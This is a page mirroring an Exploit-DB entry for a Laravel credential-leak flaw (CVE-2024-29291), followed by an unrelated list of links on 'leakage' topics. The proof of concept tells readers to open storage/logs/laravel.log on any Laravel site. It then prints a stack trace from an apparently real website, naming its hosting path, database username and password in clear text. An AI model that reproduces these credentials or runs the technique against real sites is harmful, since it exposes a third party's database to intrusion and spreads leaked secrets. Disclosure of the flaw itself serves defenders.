[webapps] Laravel Framework 11 - Credential Leakage

4 months ago

source link: https://www.exploit-db.com/exploits/52000
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Laravel Framework 11 - Credential Leakage

EDB-ID:

52000

Platform:

Date:

2024-04-21

Vulnerable App:

# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291

Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.

Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...

Copy

Recommend

Github github.com 6 years ago
Cache

GitHub - FeeiCN/GSIL: Github Sensitive Information Leakage（Github敏感信息泄露）

GSIL(GitHub Sensitive Information Leakage) 中文文档 Monitor Github sensitive information leaks in near real time and send alert noti...

www.tuicool.com 5 years ago
Cache

ZombieLoad: Cross Privilege-Boundary Data Leakage on Intel CPUs

ZombieLoad is a novel category of side-channel attacks which we refer to as data-sampling attack . It demonstrates that faulting load instructions can transiently expose private values of one Hyperthread...

www.tuicool.com 5 years ago
Cache

USB Snooping Made Easy: Crosstalk Leakage Attacks on USB Hubs (2017)

The Universal Serial Bus (USB) is the most prominent interface for connecting peripheral devices to computers. USB-connected input devices, such as keyboards, card-swipers and fingerprint readers, often send sensitive informat...

mc.ai 4 years ago
Cache

Data Leakage in Machine Learning

Data Leakage in Machine Learning How to detect and avoid data leakage Photo by

rachelbythebay.com 3 years ago
Cache

Adium's raw XML leakage leads to pain and suffering

Adium's raw XML leakage leads to pain and suffering Over the past two days, I've noticed a disturbing uptick in the amount of random garbage which is coming through into Adium, my current IM client of choice. It seems that someth...

metadataconsulting.blogspot.com 3 years ago
Cache

C# .NET The most common flaw type in .NET applications was information leakage

Sunday, December 20, 2020 C#...

mensfeld.pl 3 years ago
Cache

The hidden cost of a Ruby threads leakage

Table of Contents [show] Bug hunting Recently I’ve been working with one small application that would gradually become slower an...

www.allaboutcircuits.com 3 years ago
Cache

As Chips Scale Down, Leakage Current Goes Up. How Are Developers Responding?

News As Chips Scale Down, Leakage Current Goes Up. How Are Developers Responding? 22 hours ago by Jake Hertz Leakage current is yet another...

www.kevinhooke.com 3 years ago
Cache

Serverless framework cli with different AWS credential profiles

Serverless framework cli with different AWS credential profiles If you have multiple aws cli profiles configured to work with multiple sets of credentials, you can tell the serverless cli which profile to use with either:

www.exploit-db.com 7 months ago
Cache

[remote] Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Th...

Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Through Unprotected Sy...